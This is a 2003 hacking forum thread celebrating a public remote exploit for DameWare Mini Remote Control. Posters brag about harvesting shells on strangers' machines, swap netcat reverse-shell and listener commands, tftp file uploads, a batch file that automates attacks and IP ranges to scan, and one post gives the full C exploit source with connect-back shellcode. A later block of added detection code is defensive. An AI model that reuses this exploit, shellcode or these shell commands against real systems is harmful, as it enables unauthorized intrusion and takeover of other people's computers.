Jurojin
No.. it's just that he probably hasn't set netcat to listen on that port for incoming connections. Anyway, I have got a shell but whenever I try to install ServU I get Permission Denied even though I have stopped the Anti Virus and can Start/Stop Services, any ideas?
UnDeRTaKeR
well i dont have complaints... it all worked perfect for me...
i got something like 20 shells from that nice exploit :D
knientje
QUOTE (X-FloppY @ Dec 21 2003, 06:23 PM)
Chill m8 ppl is coming to learn
btw it's nc -l -vv -p port

EnjoY

thanks dude, that works! 8) anybody know how to config the shit if you are on a network? :/
DrDoc
BIG THX 4 da exploit :) I have tried it on my server and it works well

Big thx

Very Funny Think

Cya Doc
JaANDniET
w00t
works better than the other one :D just trying to add universal offsets

greetz
LiQuid
This Exploit works fine, but there are less vulnerable IP's...
Blast3rPL
I have a question. I'm gonna test it on my machine, I installed Dameware NT 3.73 and run it. Then I setup nc :

CODE
nc.exe -l -p 4949 -e cmd.exe


Then I'm trying to connect by dameweird exploit (from morning_wood)

CODE
dameweird.exe MYIP MYIP 4949


But It sends me Connection Refused. I turn off firewalls etc. but i'm behind NAT.

I even tried
dameweird.exe 127.0.0.1 127.0.0.1 4949
But it sends me connection refused. It little freaky ...


Please Help Me



Dr00py
Nice Exploit :D, works perfect for me.
mastervampire
has anyone been able to get that tftp thing working on a computer u got into ?

i even tried to upload a 4 byte text file and still timeout!

tftp -i 11.11.11.11 get text.txt
timeout occured


fandango
thank you very much for sharing this new exploit :)
vnet576
QUOTE (mastervampire @ Dec 21 2003, 08:12 PM)
has anyone been able to get that tftp thing working on a computer u got into ?

i even tried to upload a 4 byte text file and still timeout!

tftp -i 11.11.11.11 get text.txt
timeout occured

use echo ftp instead...search for it on the board for specific instructions.
mastervampire
couldnt find jack on echo ftp, what is it and how to use it?
Killahbee
QUOTE (Jurojin @ Dec 21 2003, 08:37 PM)
No.. it's just that he probably hasn't set netcat to listen on that port for incoming connections. Anyway, I have got a shell but whenever I try to install ServU I get Permission Denied even though I have stopped the Anti Virus and can Start/Stop Services, any ideas?

course netcat is listening, i'm not that stupid, just not lucky enough :)
Diablotic
QUOTE (Blast3rPL @ Dec 21 2003, 11:49 PM)
I have a question. I'm gonna test it on my machine, I installed Dameware NT 3.73 and run it. Then I setup nc :

CODE
nc.exe -l -p 4949 -e cmd.exe


Then I'm trying to connect by dameweird exploit (from morning_wood)

CODE
dameweird.exe MYIP MYIP 4949


But It sends me Connection Refused. I turn off firewalls etc. but i'm behind NAT.

I even tried
dameweird.exe 127.0.0.1 127.0.0.1 4949
But it sends me connection refused. It little freaky ...


Please Help Me

Damn! You are here, I can only say LOL.
127.0.0.1 - That is great, i think in this method you'll get a lot of shells, especially if you are behind a NAT :) ROTFL
Merchantp
bleh 5 pages of the same stuff neway heres an idea maybe your router isnt letting the incoming connections through maybe you should change your router settings to allow it maybe you should use another box to accept the connections that isnt on a lan maybe maybe maybe ;)
Merchantp
QUOTE
I have a question. I'm gonna test it on my machine, I installed Dameware NT 3.73 and run it. Then I setup nc :


CODE 
nc.exe -l -p 4949 -e cmd.exe



Then I'm trying to connect by dameweird exploit (from morning_wood)


CODE 
dameweird.exe MYIP MYIP 4949 



But It sends me Connection Refused. I turn off firewalls etc. but i'm behind NAT.

I even tried
dameweird.exe 127.0.0.1 127.0.0.1 4949
But it sends me connection refused. It little freaky ...


Please Help Me


i may not know what im talking about but i dont think it works on 3.73 m8 considering they put out a new version (3.73) that fixes this sploit. ;) but i may be wrong.
zero-maitimax
it should work on that version. the newest version is v 4.0.0.0
Merchantp
so the servers a diffnt version than the client bleh =/
101


Kralor exploit is just a dupe of wirepair ... , becos mister wp did it also working on NT4 ....

nice try kralor but wp own ;)
XtrA
this is good :]
but how can i defend on this in the victim`s computer?
can anyone explain me?
the
QUOTE (XtrA @ Dec 21 2003, 07:47 AM)
plz help me!!
now i get in one :]]]]
im in his computer uploaded files and typed
net start serv-u but see:
CODE

net start serv-u
The Serv-U FTP Server service is starting.
Serv-U FTP Server service could not be started.
A service specific error occurred: 100.
More help is available by typing NET HELPMSG 3547.

what now?
what can i do ? :\\\\\

that means that some kind of a serv-u server is allready running on that box
greetz
DrDoc
QUOTE (ma622 @ Dec 21 2003, 09:35 AM)
could anyone build a proggy which checks the scan.txt for vuln ips and prompts it to output.txt without dropping to shell? ;)

This is a great idea.. and i think it is not very difficult to code it.. :) But my programming knowledge is so bad that i have not the possibility to do that :(

Anybody out there who could help.. :) plz

Big Thx 4 our help

Cya Doc
LoCaliSe
When I use this exploit, i've Got reply like PATCHED, with what it's patched ?

Toxi
QUOTE (LoCaliSe @ Dec 23 2003, 12:38 AM)
When I use this exploit, i've Got reply like PATCHED, with what it's patched ?

It means that the computer you are trying to exploit has newer version than 3.73.
Newer versions are exploitable too with private exploit(I don't own this).

CODE

[+] Connecting to 130.x.x.x                  ...Done
[+] Gathering information                        ...Done
[i] Operating system : Win2000
[i] Service Pack     : 4
[+] Setting shellc0de for this version           ...Done
[+] Sending evil packet                          ...Patched
LoCaliSe
Yep Like this, so i cann't patched this version, i do upgrade this


Ok, Thanks
redcorp
very nice exploit man ....first one i tried i got a shell :P

ur a champion :P
Fernando093
eXcellent job guys, thanks a lot for the info,,,,,,,,,,,,,,,,,


U rock fellas,,,,,,, U ROCK !!!!!! :D :D :D
Blast3rPL
Diablotic LOL, I'm only want to test it on local you lame man. I may be behind NAT if I exploiting my local machine buahahaha. I've already know what I't required have active IP but in local it don't lame man. buahahahahahahahaah
Progressor
This exploit is very good, i got a lot of shells... just keep trying.
ivan288
its dead guys, well at least on the good ranges.
Diablotic
QUOTE (ivan288 @ Dec 23 2003, 01:02 PM)
its dead guys, well at least on the good ranges.

Ohhhh don't say like that. I am still making some 100mbits. Everyday at least 5 so it isn't dead but probably will be soon :(
And then we'll have to wait for another exploit :P
klassik
I've noticed that sometimes even if it does bork dw, It does not send the packet to connect back to you.
LoCaliSe
Create a dameware.bat file with that :

dame %1 yourip port
nc -l -vv -p port

and when you are an ip -----> dameware ipfound

You should be Connect automaticly


:D

* dame it's the name of your exploit ;)
AlexeyG
does this still work?
Diablotic
There is less and less vuln but you can try but you have to be fast :P
AlexeyG
yes, I have noticed that u have to be fast
I am sitting on this all day and just know I found that it is my speed...
dunno what to do :S
[Ripper]
gonna try it cheers :)
X-FloppY
almost no shells now
all patched ;X
Neo2k
the same thing, i'm too late, all the serv are PATCHED :(
zero-maitimax
all patch :S i think you ppl aren't search good

start at 217.80.2.0 maybe you have luck to..

some ppl at that range have the port on 53 ...
Divx_dude
well if ya wanne find some ;) its getting hard cuz many people have the great conections :D rooted ;)
so if someone could build a bat file that autocheck the ip list :)
LethalWordz
Yea that'd be cool, I was hoping someone would make a new one with better offsets. I gotta look into that too though. :P
taktau
someone, please :)

CODE

[root@localhost exploits]# gcc -o DameWeird DameWeird.c
DameWeird.c:18:21: winsock.h: No such file or directory
DameWeird.c:19:21: windows.h: No such file or directory
DameWeird.c: In function `cnx':
DameWeird.c:94: storage size of `yeah' isn't known
DameWeird.c:97: `AF_INET' undeclared (first use in this function)
DameWeird.c:97: (Each undeclared identifier is reported only once
DameWeird.c:97: for each function it appears in.)
DameWeird.c:97: `SOCK_STREAM' undeclared (first use in this function)
DameWeird.c:106: warning: assignment makes pointer from integer without a cast
DameWeird.c:107: dereferencing pointer to incomplete type
DameWeird.c:107: dereferencing pointer to incomplete type
DameWeird.c:109: `INADDR_NONE' undeclared (first use in this function)
DameWeird.c: In function `main':
DameWeird.c:282: `WSADATA' undeclared (first use in this function)
DameWeird.c:282: parse error before "wsaData"
DameWeird.c:290: `wsaData' undeclared (first use in this function)
DameWeird.c:299:2: warning: no newline at end of file
vnet576
dameware is a windows exploit hence the winsock header files...u have to compile it in windows.
r4BBiT
QUOTE (taktau @ Dec 24 2003, 02:45 AM)
someone, please :)

CODE

[root@localhost exploits]# gcc -o DameWeird DameWeird.c
DameWeird.c:18:21: winsock.h: No such file or directory
DameWeird.c:19:21: windows.h: No such file or directory
DameWeird.c: In function `cnx':
DameWeird.c:94: storage size of `yeah' isn't known
DameWeird.c:97: `AF_INET' undeclared (first use in this function)
DameWeird.c:97: (Each undeclared identifier is reported only once
DameWeird.c:97: for each function it appears in.)
DameWeird.c:97: `SOCK_STREAM' undeclared (first use in this function)
DameWeird.c:106: warning: assignment makes pointer from integer without a cast
DameWeird.c:107: dereferencing pointer to incomplete type
DameWeird.c:107: dereferencing pointer to incomplete type
DameWeird.c:109: `INADDR_NONE' undeclared (first use in this function)
DameWeird.c: In function `main':
DameWeird.c:282: `WSADATA' undeclared (first use in this function)
DameWeird.c:282: parse error before "wsaData"
DameWeird.c:290: `wsaData' undeclared (first use in this function)
DameWeird.c:299:2: warning: no newline at end of file

here u go, i ported it to nix, i didnt test it tho


CODE

root@hell:~# gcc -o dameware dameware.c
root@hell:~# ./dameware

     [Crpt] DameWare Mini Remote Control < v3.73 remote exploit by kralor [Crpt]
                 www.coromputer.net && undernet #coromputer

syntax: ./dameware <host> <your_ip> <your_port>


CODE

/ ********************************************************************************
******/
/*     [Crpt] DameWare Mini Remote Control < v3.73 remote exploit by kralor [Crpt]    */
/* -   -   -   -   -   -   -   -   -   -   -   -   -   -   -   -   -   -   -   -   -  */
/* 8/10 win2k successfully exploited in blind mode (lang & type [pro,srv,etc] unknown) */
/* tested against dameware versions: v3.68  v3.72                                     */
/* In comments there's some information about offsets for jmp esp on diff OS.         */
/* I've fixed a problem in the shellc0de, when I check for kernel32.dll, on winXP it  */
/* is kernel32.dll, but on win2k it is KERNEL32.DLL (both in unicode format)          */
/* shellc0de is a bit long for this b0f, so ExitThread won't be called, but it is in  */
/* the shellcode.Some people reported me 2 different offsets for winXP pro, home, sp0 */
/* or sp1, so I don't know why it's different and I haven't XP at home I can't find   */
/* another better EIP for XP (hope this 2 offsets will be enough).                    */
/* greetz: MrNice,AnAc,TripaX & Decryptus for helping me to find the EIP values.      */
/*....................................................................................*/
/* informations: kralor[at]coromputer.net,www.coromputer.net,irc undernet #coromputer */
/ ********************************************************************************
******/

#include <stdio.h>
#include <errno.h>
#include <string.h>
#include <stdlib.h>
#include <fcntl.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netdb.h>
#include <netinet/in.h>


/*
0x717564B8   jmp esp in comctl32.dll
win2k fr adv srv sp2
win2k en adv srv sp3
win2k en adv srv sp4
win2k en srv     sp3
win2k fr pro     sp3
win2k en pro     sp4

// jmp esp @ 0x77E7898B | win2k fr adv srv sp 1
// jmp esp @ 0x717564B8 | Win2k fr adv srv sp2 & Win2k en srv sp3 & Win2k en adv srv sp4 & win2k fr pro sp3
// jmp esp @ 0x7751A3AB | Win2k fr adv srv sp2 Win2k fr adv srv sp3 & Win2k fr pro sp3

/*
#define RET_WIN2K_SP0 0x717564B8
#define RET_WIN2K_SP1 0x717564B8
#define RET_WIN2K_SP2 0x717564B8
#define RET_WIN2K_SP3 0x717564B8
#define RET_WIN2K_SP4 0x717564B8
#define RET_WINXP_SP0 0x7776FE1F
#define RET_WINXP_SP1 0x7776FE1F
*/

#define RET    "\xB8\x64\x75\x71"
#define RET_XP "\x07\xD5\x36\x77"
// or #define RET_XP "\xC1\x1C\x35\x77" // this offset has been reported by many people

#define PORT 6129
#define SIZEOF 4096
#define WINUSER "h4x0r"
#define WINHOST "l33t_home"
#define USERPROFILE_NAME "script kiddie"
#define USERPROFILE_COMPANY "g33k solutions."
#define USERPROFILE_LICENSE "11111-OEM-0001111-11111"
#define USERPROFILE_DATE "12/24/03 00:00:00"
#define INTERFACE_IP "192.168.1.1,192.168.1.2"
#define WINDOMAIN "l33t_d0m41n"
#define CLIENT_VERSION "3.72.0.0"

/*
void print_packet(char *buffer, int begin, int end)
{
int i,j;
char ascii[9];

for(i=begin,j=0;i<end;i++,j++) {
if(i%10==0) {
 printf("\r\n%04d: ",i);
 j=0;
memset(ascii,0,sizeof(ascii));
}
printf("0x%02x ",(unsigned char)buffer[i]);
if(i%10==9) {
ascii[10]=0x00;
printf("%s",ascii);
}
if(!isprint(buffer[i]))
ascii[j]='.';
else
ascii[j]=buffer[i];
}
printf("%s\r\n",ascii);
return;
}
*/

int cnx(char *host)
{
int sock;
struct sockaddr_in yeah;
struct hostent *she;

sock=socket(AF_INET,SOCK_STREAM,0);
if(!sock) {
printf("error: unable to create socket\r\n");
return 0;
}
yeah.sin_family=AF_INET;
yeah.sin_addr.s_addr=inet_addr(host);
yeah.sin_port=htons(PORT);

if((she=gethostbyname(host))!=NULL) {
memcpy((char *)&yeah.sin_addr,she->h_addr,she->h_length);
} else {
if((yeah.sin_addr.s_addr=inet_addr(host))==INADDR_NONE) {
printf("error: cannot resolve host\r\n");
return 0;
}
}
printf("[+] Connecting to %-30s ...",host);
if(connect(sock,(struct sockaddr*)&yeah,sizeof(yeah))!=0) {
printf("error: connection refused\r\n");
return 0;
}
printf("Done\r\n");
return sock;
}

void set_sc(int os, int sp, char *rhost, int rport, char *shellc0de)
{
unsigned int ip=0;
unsigned short port=0;
char *port_to_shell="",*ip1="";

ip = inet_addr(rhost); ip1 = (char*)&ip;
shellc0de[325]=ip1[0]^0x95;shellc0de[326]=ip1[1]^0x95;
shellc0de[327]=ip1[2]^0x95; shellc0de[328]=ip1[3]^0x95;

port = htons(rport);
port_to_shell = (char *) &port;
shellc0de[319]=port_to_shell[0]^0x95;
shellc0de[320]=port_to_shell[1]^0x95;

switch(os)
{
case 0: // win2k
/*
switch(sp)
{
case 0:
*(long*)&shellc0de[0]=RET_WIN2K_SP0;
break;
case 1:
*(long*)&shellc0de[0]=RET_WIN2K_SP1;
break;
case 2:
*(long*)&shellc0de[0]=RET_WIN2K_SP2;
break;
case 3:
*(long*)&shellc0de[0]=RET_WIN2K_SP3;
break;
case 4:
*(long*)&shellc0de[0]=RET_WIN2K_SP4;
break;
}
*/
break;
case 1: // winXP
shellc0de[167]=shellc0de[215]=(unsigned char)0xfe;
shellc0de[345]=shellc0de[453]=(unsigned char)0xfe;
/*
switch(sp)
{
case 0:
*(long*)&shellc0de[0]=RET_WINXP_SP0;
break;
case 1:
*(long*)&shellc0de[0]=RET_WINXP_SP1;
break;
}
*/
break;
}
return;
}

int start_auth(int sock, char *rhost, int rport)
{
int size,i=4,os,sp;
char buffer[SIZEOF];
char shellc0de[] =
      "\xeb\x02\xeb\x0f\x66\x81\xec\x04\x08\x8b\xec\x83\xec\x50\xe8\xef"
      "\xff\xff\xff\x5b\x80\xc3\x10\x33\xc9\x66\xb9\xba\x01\x80\x33\x95"
      "\x43\xe2\xfa\x7e\xfa\xa6\x4e\x26\xa5\xf1\x1e\x96\x1e\xd5\x99\x1e"
      "\xdd\x99\x1e\x54\x1e\xc9\xb1\x9d\x1e\xe5\xa5\x96\xe1\xb1\x91\xad"
      "\x8b\xe0\xdd\x1e\xd5\x8d\x1e\xcd\xa9\x96\x4d\x1e\xce\xed\x96\x4d"
      "\x1e\xe6\x89\x96\x65\xc3\x1e\xe6\xb1\x96\x65\xc3\x1e\xc6\xb5\x96"
      "\x45\x1e\xce\x8d\xde\x1e\xa1\x0f\x96\x65\x96\xe1\xb1\x81\x1e\xa3"
      "\xae\xe1\xb1\x8d\xe1\x93\xde\xb6\x4e\xe0\x7f\x56\xca\xa6\x5c\xf3"
      "\x1e\x99\xca\xca\x1e\xa9\x1a\x18\x91\x92\x56\x1e\x8d\x1e\x56\xae"
      "\x54\xe0\x34\x56\x16\x79\xd5\x1e\x79\x14\x79\xb5\x97\x95\x95\xfd"
      "\xec\xd0\xed\xd4\xff\x9f\xff\xde\xff\x95\x7d\xe3\x6a\x6a\x6a\xa6"
      "\x5c\x52\xd0\x69\xe2\xe6\xa7\xca\xf3\x52\xd0\x95\xa6\xa7\x1d\xd8"
      "\x97\x1e\x48\xf3\x16\x7e\x91\xc4\xc4\xc6\x6a\x45\x1c\xd0\x91\xfd"
      "\xe7\xf0\xe6\xe6\xff\x9f\xff\xde\xff\x95\x7d\xd3\x6a\x6a\x6a\x1e"
      "\xc8\x91\x1c\xc8\x12\x1c\xd0\x02\x52\xd0\x69\xc2\xc6\xd4\xc6\x52"
      "\xd0\x95\xfa\xf6\xfe\xf0\x52\xd0\x91\xe1\xd4\x95\x95\x1e\x58\xf3"
      "\x16\x7c\x91\xc4\xc6\x6a\x45\xa6\x4e\xc6\xc6\xc6\xc6\xff\x94\xff"
      "\x97\x6a\x45\x1c\xd0\x31\x52\xd0\x69\xf6\xfa\xfb\xfb\x52\xd0\x95"
      "\xf0\xf6\xe1\x95\x1e\x58\xf3\x16\x7c\x91\xc4\x6a\xe0\x12\x6a\xc0"
      "\x02\xa6\x4e\x26\x97\x1e\x40\xf3\x1c\x8f\x96\x46\xf3\x52\x97\x97"
      "\x0f\x96\x46\x52\x97\x55\x3d\x94\x94\xff\x85\xc0\x6a\xe0\x31\x6a"
      "\x45\xfd\xf0\xe6\xe6\xd4\xff\x9f\xff\xde\xff\x95\x7d\x51\x6b\x6a"
      "\x6a\xa6\x4e\x52\xd0\x39\xd1\x95\x95\x95\x1c\xc8\x25\x1c\xc8\x2d"
      "\x1c\xc8\x21\x1c\xc8\x29\x1c\xc8\x55\x1c\xc8\x51\x1c\xc8\x5d\x52"
      "\xd0\x4d\x94\x94\x95\x95\x1c\xc8\x49\x1c\xc8\x75\x1e\xd8\x31\x1c"
      "\xd8\x71\x1c\xd8\x7d\x1c\xd8\x79\x18\xd8\x65\xc4\x18\xd8\x39\xc4"
      "\xc6\xc6\xc6\xff\x94\xc6\xc6\xf3\x52\xd0\x69\xf6\xf8\xf3\x52\xd0"
      "\x6b\xf1\x95\x1d\xc8\x6a\x18\xc0\x69\xc7\xc6\x6a\x45\xfd\xed\xfc"
      "\xe1\xc1\xff\x94\xff\xde\xff\x95\x7d\xcd\x6b\x6a\x6a\x6a";

size=recv(sock,buffer,SIZEOF,0);
if(buffer[0]!=0x30||buffer[1]!=0x11) {
printf("error: wrong data received\r\n");
return -1;
}
buffer[28]=0x00;buffer[36]=0x01;
send(sock,buffer,size,0);
memset(buffer,0,SIZEOF);
printf("[+] Gathering %-30s     ...","information");
for(size=0;size<4096;size+=recv(sock,&buffer[size],SIZEOF,0));

if(buffer[0]!=0x10||buffer[1]!=0x27) {
printf("error: wrong data received\r\n");
return -1;
}
printf("Done\r\n");
sp=(unsigned int)buffer[37];
printf("[i] Operating system : ");
if(buffer[16]==0x28||buffer[17]==0x0a) {
os=1;
printf("WinXP");
} else {
printf("Win2000");
os=0;
}
printf("\r\n[i] Service Pack     : %s\r\n",&buffer[37]);
printf("[+] Setting shellc0de for this %-15s   ...","version");
set_sc(os,sp,rhost,rport,shellc0de);

memset(&buffer[2],0,SIZEOF-2);
strcpy(&buffer[175],WINUSER);
memset(&buffer[416],0x90,180);
if(os==0)
memcpy(&buffer[516],RET,4);
else
memcpy(&buffer[516],RET_XP,4);
memcpy(&buffer[520],shellc0de,sizeof(shellc0de));
strcpy(&buffer[1200],WINHOST);strcpy(&buffer[975],USERPROFILE_NAME);
strcpy(&buffer[1295],USERPROFILE_COMPANY);strcpy(&buffer[1495],USERPROFILE_LICENSE);
strcpy(&buffer[1755],USERPROFILE_DATE);strcpy(&buffer[2015],WINHOST);
strcpy(&buffer[2275],INTERFACE_IP);strcpy(&buffer[2535],WINDOMAIN);
strcpy(&buffer[2795],CLIENT_VERSION);
printf("Done\r\n");
printf("[+] Sending evil %-30s  ...","packet");
send(sock,buffer,SIZEOF,0);
memset(buffer,0,SIZEOF);
size=recv(sock,buffer,SIZEOF,0);

if(buffer[0]!=0x32||buffer[1]!=0x11) {
printf("Patched\r\n");
return -1;
}
printf("Done\r\n");
printf("[i] Shell should be arrived at %s:%d\r\n",rhost,rport);
return 0;
}

void banner(void)
{
printf("\r\n      [Crpt] DameWare Mini Remote Control < v3.73 remote exploit by kralor [Crpt]\r\n");
printf("\t\t  www.coromputer.net && undernet #coromputer\r\n\r\n");
return;
}

int main(int argc, char *argv[])
{
int sock;

banner();
if(argc!=4) {
printf("syntax: %s <host> <your_ip> <your_port>\r\n",argv[0]);
return -1;
}

sock=cnx(argv[1]);
if(!sock)
return -1;
start_auth(sock,argv[2],atoi(argv[3]));
return 0;
}
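
Added example (editor's code, not from any poster in this thread): a detection check for the oversized login packet that the source above builds, which also answers the earlier question about defending against it. It uses only the layout visible in that source (a 4096-byte client packet beginning 0x10 0x27, user-name field at offset 175, next field at 975); the zero-padding expectation, the 32-byte threshold and all function names are assumptions, and the sample packets are constructed and carry no payload.

```c
#include <stdio.h>
#include <string.h>

/* Offsets and sizes below are the ones the posted source uses. */
#define DW_PKT_SIZE 4096  /* SIZEOF: length of the client packet */
#define DW_USER_OFF 175   /* where the source writes WINUSER */
#define DW_NEXT_OFF 975   /* next field (USERPROFILE_NAME) */
#define NOP_RUN_MIN 32    /* assumption: alert threshold chosen for this example */

enum { DW_CLEAN = 0, DW_NOT_AUTH = 1, DW_NOP_SLED = 2, DW_FIELD_OVERRUN = 4 };

/* Length of the longest run of byte b in p[0..n). */
static size_t longest_run(const unsigned char *p, size_t n, unsigned char b)
{
    size_t best = 0, cur = 0;
    for (size_t i = 0; i < n; i++) {
        cur = (p[i] == b) ? cur + 1 : 0;
        if (cur > best) best = cur;
    }
    return best;
}

/* Inspect one reassembled client->server payload seen on TCP 6129. */
int dw_check_client_packet(const unsigned char *pkt, size_t len)
{
    int flags = DW_CLEAN;
    if (len != DW_PKT_SIZE || pkt[0] != 0x10 || pkt[1] != 0x27)
        return DW_NOT_AUTH;              /* not the packet type modelled here */
    const unsigned char *field = pkt + DW_USER_OFF;
    size_t span = DW_NEXT_OFF - DW_USER_OFF;
    if (longest_run(field, span, 0x90) >= NOP_RUN_MIN)
        flags |= DW_NOP_SLED;
    /* Assumption: a benign client sends a NUL-terminated name, zero-padded. */
    const unsigned char *nul = memchr(field, 0, span);
    if (nul == NULL) return flags | DW_FIELD_OVERRUN;
    for (const unsigned char *q = nul; q < field + span; q++)
        if (*q != 0) { flags |= DW_FIELD_OVERRUN; break; }
    return flags;
}

/* Constructed sample: well-formed packet with short text fields. */
void make_benign(unsigned char *pkt)
{
    memset(pkt, 0, DW_PKT_SIZE);
    pkt[0] = 0x10; pkt[1] = 0x27;
    strcpy((char *)pkt + DW_USER_OFF, "alice");
    strcpy((char *)pkt + DW_NEXT_OFF, "Alice Example");
}

/* Constructed sample: same layout with 0x90 filler past the name; no payload. */
void make_overrun(unsigned char *pkt)
{
    make_benign(pkt);
    memset(pkt + 416, 0x90, 180);
    memcpy(pkt + 516, "AAAA", 4);  /* placeholder bytes, not an address */
}

int main(void)
{
    static unsigned char pkt[DW_PKT_SIZE];
    make_benign(pkt);
    printf("benign  -> flags %d\n", dw_check_client_packet(pkt, sizeof pkt));
    make_overrun(pkt);
    printf("overrun -> flags %d\n", dw_check_client_packet(pkt, sizeof pkt));
    return 0;
}
```
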
Feanor
I've compiled and run the exploit all right, but can't get shell anywhere, guess that's because the machines i'm trying to get shell on are not running DameWare version v3.73

Anybody knows a way to check what version is that machine running (except just trying all the IPs one by one).
X-FloppY
what is this code?
jimmy
sure it's almost dead ... :(
MpR
Gotta love how people want want want .. You can never give them enough to be happy .. Had this sploit before I came here dude but want to say thanks all the same works well over and easy aslong as youre willing to learn as alot proved by posts they are not .. I hope they cant get it compiled as they dont deserve.

Thanks
vnet576
QUOTE (MpR @ Dec 24 2003, 04:02 PM)
Gotta love how people want want want .. You can never give them enough to be happy .. Had this sploit before I came here dude but want to say thanks all the same works well over and easy aslong as youre willing to learn as alot proved by posts they are not .. I hope they cant get it compiled as they dont deserve.

Thanks

and leave more for the rest of us :D